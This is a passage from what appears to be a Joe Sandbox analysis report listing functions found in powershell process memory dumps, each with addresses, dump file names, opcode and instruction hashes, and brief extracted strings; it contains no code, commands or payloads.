                  • Source File: 00000002.00000002.2725311731.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 148786693d0bbe3e65a94c37cd9f0be2575f505c93aba3f29ea94e8cafc350e0
                  • Instruction ID: 7a66d5a63e540ea023aefc32001cb94fa306daea1a2cad89830066ef42dc9641
                  • Opcode Fuzzy Hash: 148786693d0bbe3e65a94c37cd9f0be2575f505c93aba3f29ea94e8cafc350e0
                  • Instruction Fuzzy Hash: 8D51F731E0EA8A4FE795EB2854506B877E1FF55790F5400BAD10ED31D2EF1CE8448785
                  Function 00007FF848FD7889 Relevance: .1, Instructions: 120COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.2725311731.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 942bb7d86702d138052a0e168d81dd70bd992dd60a00538f8d9650a4c6391331
                  • Instruction ID: 71e6301e32931b044321fc68e38ddeaf98365863e2431f9b9d7a8158946b8efe
                  • Opcode Fuzzy Hash: 942bb7d86702d138052a0e168d81dd70bd992dd60a00538f8d9650a4c6391331
                  • Instruction Fuzzy Hash: C4312632E1DE594FE7A5E72C68116F8B7E1EF546A0F1401BBC50AD71C6EF18AC008786
                  Function 00007FF848F03535 Relevance: .0, Instructions: 49COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.2724190341.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                  • Instruction ID: 737f34899534db96bc119e1e2c3244d5a1a690612f5ce53084bfd790e6dcc215
                  • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                  • Instruction Fuzzy Hash: 8501447111CB0C4FD748EF0CE451AA5B7E0FB95364F10056EE58AC36A5DB26E881CB45

                  Executed Functions

                  Function 07759850 Relevance: 27.5, Strings: 21, Instructions: 1269COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$tPjq$tPjq$tPjq$tPjq$$jq$$jq$$jq$$jq$$jq
                  • API String ID: 0-3881458981
                  • Opcode ID: f08bca67bc6c3477cb8edcc72798f935e6c59784b40a15686389c0e9a312aa51
                  • Instruction ID: 38442c91f4764e352cb2a9db0e7e3da550476989effc8af071b70827c0ae1833
                  • Opcode Fuzzy Hash: f08bca67bc6c3477cb8edcc72798f935e6c59784b40a15686389c0e9a312aa51
                  • Instruction Fuzzy Hash: 74924BB1704306DFDB118B7888117AABFE6AFC2250F15C97ADD05CB292DBB5D841CBA1
                  Function 07757110 Relevance: 14.8, Strings: 11, Instructions: 1049COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$P$tPjq$tPjq
                  • API String ID: 0-3386520382
                  • Opcode ID: a2e97888d1f63d29f56af117f5a1918445cd9a7db841e630ad9988fc818e89a4
                  • Instruction ID: 62e83f725a01d2950c58cdf065ec36481b711b27f51106b6d513262d4803a8e3
                  • Opcode Fuzzy Hash: a2e97888d1f63d29f56af117f5a1918445cd9a7db841e630ad9988fc818e89a4
                  • Instruction Fuzzy Hash: 9D92C4B0A01215DFDB24CB68C950BAABBF2FF85340F14C9A9D9059B395CB71ED41CB92
                  Function 077525A8 Relevance: 13.4, Strings: 10, Instructions: 895COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq
                  • API String ID: 0-396422569
                  • Opcode ID: d2f59aba1e69a8a597da4f3e122108589a0ba9d1c19b9967663b8bd103fdb1ad
                  • Instruction ID: 9a052f0d9e50db6e41ac0b34944efecd54b487d64a8ebdfed34e53796e69174d
                  • Opcode Fuzzy Hash: d2f59aba1e69a8a597da4f3e122108589a0ba9d1c19b9967663b8bd103fdb1ad
                  • Instruction Fuzzy Hash: 3762BEF4B002059FCB14CBA8C550AAABBE6FF89354F14C46AD8059F356DB72EC45CBA1
                  Function 077591D0 Relevance: 13.0, Strings: 10, Instructions: 529COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq$4'jq$4'jq$$jq$$jq$$jq$$jq$$jq$$jq
                  • API String ID: 0-2815571254
                  • Opcode ID: 9e319ce35ed4fc3459ac23eef42d2b75922bf5520426a2ceb7ee750f16cba0e3
                  • Instruction ID: d50ef963af407c1fed1e2301e26c2375947d1db032ee9ed4776edfdfdfa65277
                  • Opcode Fuzzy Hash: 9e319ce35ed4fc3459ac23eef42d2b75922bf5520426a2ceb7ee750f16cba0e3
                  • Instruction Fuzzy Hash: F6024CB1704306DFCB158B7894106ABBBE6DFC6254F1488ABDE05CB292DB71E845CFA1
                  Function 07758BF0 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq
                  • API String ID: 0-3975720690
                  • Opcode ID: c6b59066ea40882c67f5831b48e055babeda0cc7d28a7b86d36cb1f7e33e775c
                  • Instruction ID: 9767fd01215f178975b4984d5f7d1ed69277f235ca3d4e1ebce2081d446e6711
                  • Opcode Fuzzy Hash: c6b59066ea40882c67f5831b48e055babeda0cc7d28a7b86d36cb1f7e33e775c
                  • Instruction Fuzzy Hash: 18D19FB4A11205DFDB04CB68C551BAEBBF2AF88340F10C819D9056F395CBB6EC45CBA2
                  Function 07751D28 Relevance: 7.8, Strings: 6, Instructions: 333COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq$$jq$$jq$$jq$$jq
                  • API String ID: 0-210473685
                  • Opcode ID: 3d00442556e8271b5e476078be05145b60a7882b97afe7f14dabd983c207d4a2
                  • Instruction ID: f4a914f8ec620ca89d02a4ecc021c10c3e0d755e0162f27e2f1b7eea51aa0840
                  • Opcode Fuzzy Hash: 3d00442556e8271b5e476078be05145b60a7882b97afe7f14dabd983c207d4a2
                  • Instruction Fuzzy Hash: 33B139F1B0530A9FDB109B68D80076BBBE6EF81292F54C86BDD058B252DBB1C841C7A1
                  Function 0775B060 Relevance: 5.6, Strings: 4, Instructions: 602COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq$4'jq$4'jq
                  • API String ID: 0-4000621977
                  • Opcode ID: 408162a9061d003c37548591a7038724760b4b14427538c7c385e471758c8e24
                  • Instruction ID: e54f98eb34ad73f2f1cee101e88d0dba1e3a9c298052e7f45dfbd246060c3a44
                  • Opcode Fuzzy Hash: 408162a9061d003c37548591a7038724760b4b14427538c7c385e471758c8e24
                  • Instruction Fuzzy Hash: C81225F1B043559FCB258B68981177ABBE6EFC2350F14C86ADC05CB6A2DB75C841C7A2
                  Function 07758BD2 Relevance: 4.0, Strings: 3, Instructions: 274COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq$4'jq
                  • API String ID: 0-3078559419
                  • Opcode ID: 095f3f276383af7f04df193233c2a9a69783d2aa9c0f30014764012bc9f72a49
                  • Instruction ID: 4dbbe5477cfeda3e3a8b35ba6e48d251f5ba28ba5fcd386c08580553dec59bc1
                  • Opcode Fuzzy Hash: 095f3f276383af7f04df193233c2a9a69783d2aa9c0f30014764012bc9f72a49
                  • Instruction Fuzzy Hash: DDB1ADB4A11205DFDB14CB58C551BAABBF2FF88340F14C859D9056F395CBB6E842CBA2
                  Function 07756468 Relevance: 3.3, Strings: 2, Instructions: 833COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq
                  • API String ID: 0-1204115232
                  • Opcode ID: 39d4bfe802e1883ccdf3e248188f1176649e6c171c8ff79f740ca0ce60cc1691
                  • Instruction ID: 08c8b4298caa7cac28fed53e8a670c4dbd95ca779195a7a1170fbd2673092fd4
                  • Opcode Fuzzy Hash: 39d4bfe802e1883ccdf3e248188f1176649e6c171c8ff79f740ca0ce60cc1691
                  • Instruction Fuzzy Hash: 7F725AB4A00305CFDB14CBA8C655BAABBF2EB85704F54C469E8099F355CB72EC46CB91
                  Function 07757B23 Relevance: 2.9, Strings: 2, Instructions: 395COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq$4'jq
                  • API String ID: 0-1204115232
                  • Opcode ID: ac97b887dfea344d78844429704ea2c322f011aedb8c352a7b4caf3a1fb30c70
                  • Instruction ID: fe6a215ceae6770ad535b8475b145a723d9d7491f796ea47f092f25823a16b16
                  • Opcode Fuzzy Hash: ac97b887dfea344d78844429704ea2c322f011aedb8c352a7b4caf3a1fb30c70
                  • Instruction Fuzzy Hash: 35F180B4A01214DFEB14DB68C951BAABBF2FF84300F10C5A5D9096F395CB76AD818B91
                  Function 08573D77 Relevance: 2.6, Strings: 2, Instructions: 79COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: d%pq$d%pq
                  • API String ID: 0-3434673084
                  • Opcode ID: cd25adf2a243d682935de103fd41065033c83fd115418019058f72421578be05
                  • Instruction ID: 8b4410154246ac451bb72f35d22e0d6ee4682ecb1bb3d1378025d42fce8e1e8a
                  • Opcode Fuzzy Hash: cd25adf2a243d682935de103fd41065033c83fd115418019058f72421578be05
                  • Instruction Fuzzy Hash: 80310775A00605DFCB14CF58D5849AEFBB1FF48320B2482A9D859AB755C732EC81CB94
                  Function 07751D08 Relevance: 2.6, Strings: 2, Instructions: 69COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: $jq$$jq
                  • API String ID: 0-3720491408
                  • Opcode ID: 647a2f570ad2fd526faa120d905554e9ee019b33722dd0e021c1ca08fde9984d
                  • Instruction ID: a4d95f2f6fb39425c6c10b6a2bd73ac1b13e37c084a834b4db2645e27148a69c
                  • Opcode Fuzzy Hash: 647a2f570ad2fd526faa120d905554e9ee019b33722dd0e021c1ca08fde9984d
                  • Instruction Fuzzy Hash: 0F21D6B160838ADFD712CB14D800B62BFB9EF83295F598497DC048B256DBB5DC50C761
                  Function 07756466 Relevance: 1.9, Strings: 1, Instructions: 637COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq
                  • API String ID: 0-3676250632
                  • Opcode ID: 35de87e9ac76201f5ddba0fc928ffac76ee0472689d36f2267e736031ff9f122
                  • Instruction ID: 868fe4c3572939088b2afe7677acff18f28dae68e773ee6ca63a923800273acf
                  • Opcode Fuzzy Hash: 35de87e9ac76201f5ddba0fc928ffac76ee0472689d36f2267e736031ff9f122
                  • Instruction Fuzzy Hash: BB4248B4A00205DFDB10CB58C580BAABBF2FB89714F54C4A9E9099F355CB72EC46CB91
                  Function 0775644B Relevance: 1.9, Strings: 1, Instructions: 627COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq
                  • API String ID: 0-3676250632
                  • Opcode ID: 26d88fe5859865ce0f8d510f87e65f246794e3701f0d9ae30b739c2a06c365a5
                  • Instruction ID: 232649c15ae9849cb910fd100d52af472cf923bd9f149835b439723144a82c3e
                  • Opcode Fuzzy Hash: 26d88fe5859865ce0f8d510f87e65f246794e3701f0d9ae30b739c2a06c365a5
                  • Instruction Fuzzy Hash: 984248B4A00205DFDB10CB58C581BAABBF2FB89714F54C499E9099F356CB72EC46CB91
                  Function 07758113 Relevance: 1.7, Strings: 1, Instructions: 450COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: P
                  • API String ID: 0-3110715001
                  • Opcode ID: b383b29306d75fb6198283d67858009c225037dc89f1fd0debe1084c0c3d68f1
                  • Instruction ID: da807635f6af5814e67ee08895f9bff539e9b814a7f6936a19aab9697c89453f
                  • Opcode Fuzzy Hash: b383b29306d75fb6198283d67858009c225037dc89f1fd0debe1084c0c3d68f1
                  • Instruction Fuzzy Hash: 3402A0B4A01205DFDB20CB58C950BAAB7F2FB85340F14C969D9096B355CBB2AC41CF92
                  Function 07754494 Relevance: 1.5, Strings: 1, Instructions: 211COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: tPjq
                  • API String ID: 0-297075936
                  • Opcode ID: 001910a7f3eaaa02314da4580529fac6fa000f77dd20e8139a3046ce9bfcafb0
                  • Instruction ID: 07d2d310b9ebbc39841baf289fc38a40520ea9cde7637a411e486aface07f88d
                  • Opcode Fuzzy Hash: 001910a7f3eaaa02314da4580529fac6fa000f77dd20e8139a3046ce9bfcafb0
                  • Instruction Fuzzy Hash: A97138F064D3C19FC716CB649964AA1BFB1AF43354F0985CBDC848F1A3C6A59C8AC762
                  Function 08575140 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: PHjq
                  • API String ID: 0-751881793
                  • Opcode ID: 61669a9786d0dcdf9d4baf7d9bda5c30529b3f5bb5494743b07888fd5238411e
                  • Instruction ID: 9d8c97820f0296c55e4b921fdef59c8d34b794811192f082d670cdf1332e9848
                  • Opcode Fuzzy Hash: 61669a9786d0dcdf9d4baf7d9bda5c30529b3f5bb5494743b07888fd5238411e
                  • Instruction Fuzzy Hash: 3E715B30A002599FDF15DBF8D9546ADBBB2BF85305F248429D402AF3A4EB78AD49CB41
                  Function 07759834 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'jq
                  • API String ID: 0-3676250632
                  • Opcode ID: 1d7abefb2b5bff44ff5efae22aa245796248c9b8db24301d2197926ffc73db95
                  • Instruction ID: bc5c4a4134eda5811b92287ba1594b232c4db35cbcd0c9882f991dcf0e4b776e
                  • Opcode Fuzzy Hash: 1d7abefb2b5bff44ff5efae22aa245796248c9b8db24301d2197926ffc73db95
                  • Instruction Fuzzy Hash: 5F41F8F0B04303DFCF108B28855477AB7EAAF86294F1488A6DE459B255D7B2F941CFA1
                  Function 08575132 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: PHjq
                  • API String ID: 0-751881793
                  • Opcode ID: 4807622fa6d136b5010bc9d9d2797a7ec8ceb1fd99bf0f84bcc98e965597fca9
                  • Instruction ID: 48dc13722ba3b58a9d510a60dd291ffcf991ccac95cee794d528da527980f00f
                  • Opcode Fuzzy Hash: 4807622fa6d136b5010bc9d9d2797a7ec8ceb1fd99bf0f84bcc98e965597fca9
                  • Instruction Fuzzy Hash: 5D517B70A013599FDF15DFB8D9446AEBBB2BF85301F248529D406AF3A4EB74AC49CB00
                  Function 085751CF Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: PHjq
                  • API String ID: 0-751881793
                  • Opcode ID: 92f730849bbb0b3c63df7093a2201970f24fffa1a11226b04d664dc9aea400e9
                  • Instruction ID: 30a89682272fde8c468ca611921bc4fcc355d28b9ffd3b663393297d9ca8c0ef
                  • Opcode Fuzzy Hash: 92f730849bbb0b3c63df7093a2201970f24fffa1a11226b04d664dc9aea400e9
                  • Instruction Fuzzy Hash: B1310670E01259CFDF18DFA8D9486ADBBB2BF85305F248429D406AB364EB749845CB44
                  Function 07756D51 Relevance: .5, Instructions: 459COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fe564c3873ef97f2e3ac1ae70ca56545e203abea3df0b4207c429edfbea956e3
                  • Instruction ID: ae8763a0ed508191cf518b34b6157ffa6c3c087240b8a0eebe8f575369b3437f
                  • Opcode Fuzzy Hash: fe564c3873ef97f2e3ac1ae70ca56545e203abea3df0b4207c429edfbea956e3
                  • Instruction Fuzzy Hash: 6D1238B4A00205DFDB14CB58C581AAABBF2FB85704F54C4A9E9099F351CBB2ED46CB91
                  Function 08575C00 Relevance: .4, Instructions: 430COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 235c48c83aa2308a0fc6d4b9c081549da34e94c4b0df39580a4c3235a52bb865
                  • Instruction ID: 786dd354be3195e18707936206236c5aa0ee13289a6b76bb14a9e2a5f43aba9f
                  • Opcode Fuzzy Hash: 235c48c83aa2308a0fc6d4b9c081549da34e94c4b0df39580a4c3235a52bb865
                  • Instruction Fuzzy Hash: D7021A74A012199FCB05CF98D584AAEBBB2FF88311F24C569E805AB365D731ED46CB90
                  Function 07752A4B Relevance: .4, Instructions: 409COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 141689e8b4b0e242a8facf5db12710511e5ff9e02ea5471615ed5e5f606a46e3
                  • Instruction ID: 987be1b80eec73657c9f0a5677df4326c487b105db561fa3308758bac555e068
                  • Opcode Fuzzy Hash: 141689e8b4b0e242a8facf5db12710511e5ff9e02ea5471615ed5e5f606a46e3
                  • Instruction Fuzzy Hash: C6F14AF4A012059FDB14CB98C581FA9BBF2FB89354F14C469E805AB356DBB2EC41CB91
                  Function 07752588 Relevance: .4, Instructions: 384COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: adeda0ea4712c99a277e716a1c4fb48de0baa40a5d69ab636e2043d1d97ea778
                  • Instruction ID: 42747016755da4562eade73da46a9f4dedd45a7ba2978daed2947c168337dfbd
                  • Opcode Fuzzy Hash: adeda0ea4712c99a277e716a1c4fb48de0baa40a5d69ab636e2043d1d97ea778
                  • Instruction Fuzzy Hash: 53F16AF4A012059FCB14CF98C580EAABBF2FB89754F14C56AD805AB356DB72EC41CB91
                  Function 07752597 Relevance: .4, Instructions: 380COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 958c7696f29712afa3a8cbc65252a41293450f7eb873c79156508f1fd2a73a2c
                  • Instruction ID: 9d6f6586126474d994fd40dea440de94306a1c699aba7e0e232079cda23d4ef5
                  • Opcode Fuzzy Hash: 958c7696f29712afa3a8cbc65252a41293450f7eb873c79156508f1fd2a73a2c
                  • Instruction Fuzzy Hash: ACF159F4A012059FCB14CF98C580EAABBF2FB89754F14C56AD805AB356CB72EC45CB91
                  Function 085707A0 Relevance: .3, Instructions: 338COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e7bdaef25905c609844cc359026beb81adaf11e73e6e6075a4154c66add48eff
                  • Instruction ID: 9bed37a59c0b7986f50fab55bf325dc3b2f3ca4e0113d125231700556d8d9aa4
                  • Opcode Fuzzy Hash: e7bdaef25905c609844cc359026beb81adaf11e73e6e6075a4154c66add48eff
                  • Instruction Fuzzy Hash: 2DE1E674A00609DFDB05DF98D584A9EBBF2FF88310F248559E805AB3A5C731ED82CB90
                  Function 077560C0 Relevance: .2, Instructions: 247COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3fad961083a081b4cf35382095d5b791558e876e1a6ace392ca03c0ba0ff5dc6
                  • Instruction ID: bcb364d574cc3a545f5ac590bf6b609bc142fba3627c5a7f2ed989604950a782
                  • Opcode Fuzzy Hash: 3fad961083a081b4cf35382095d5b791558e876e1a6ace392ca03c0ba0ff5dc6
                  • Instruction Fuzzy Hash: F19185B4B102049FDB14DB68C551BAABBE3AF84704F508864E905AF396CF76AC41CB96
                  Function 077560A0 Relevance: .2, Instructions: 229COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a6547792cb7a36308c097bd60ec75a534b889436119de684e906b032789edfda
                  • Instruction ID: e15941f37c8f3002e79ed20820ca44930b4de9fd2079c492952dcd9013d55a71
                  • Opcode Fuzzy Hash: a6547792cb7a36308c097bd60ec75a534b889436119de684e906b032789edfda
                  • Instruction Fuzzy Hash: 1191A6B4A002009FDB14CB68C551FAEBBF3AF84714F548859E805AF396CB76EC41CB95
                  Function 077560BE Relevance: .2, Instructions: 220COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2444780511.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d8f6f364a588df694af7ebc910f5fd815458602b73d23484835189c3c3d2f280
                  • Instruction ID: 47f5caed14f5ecfe374100772ac43bb86e0c3dfb2e7e3c75c09242ccc9eac46c
                  • Opcode Fuzzy Hash: d8f6f364a588df694af7ebc910f5fd815458602b73d23484835189c3c3d2f280
                  • Instruction Fuzzy Hash: 4F8183B4A002049FDB14DB68C551FAEBBF3EF84714F508864E905AB396CB76EC41CBA5
                  Function 085757A0 Relevance: .2, Instructions: 218COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2446335538.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_8570000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 56b6d61068c52a22a3cc346307d4c82c60931985c99ee9f5f1b1d4e33c2e17f0
                  • Instruction ID: 7a954120e7e3c88b7e289c19b06e95968341ede14be48c42ce1a08004d193657
                  • Opcode Fuzzy Hash: 56b6d61068c52a22a3cc346307d4c82c60931985c99ee9f5f1b1d4e33c2e17f0
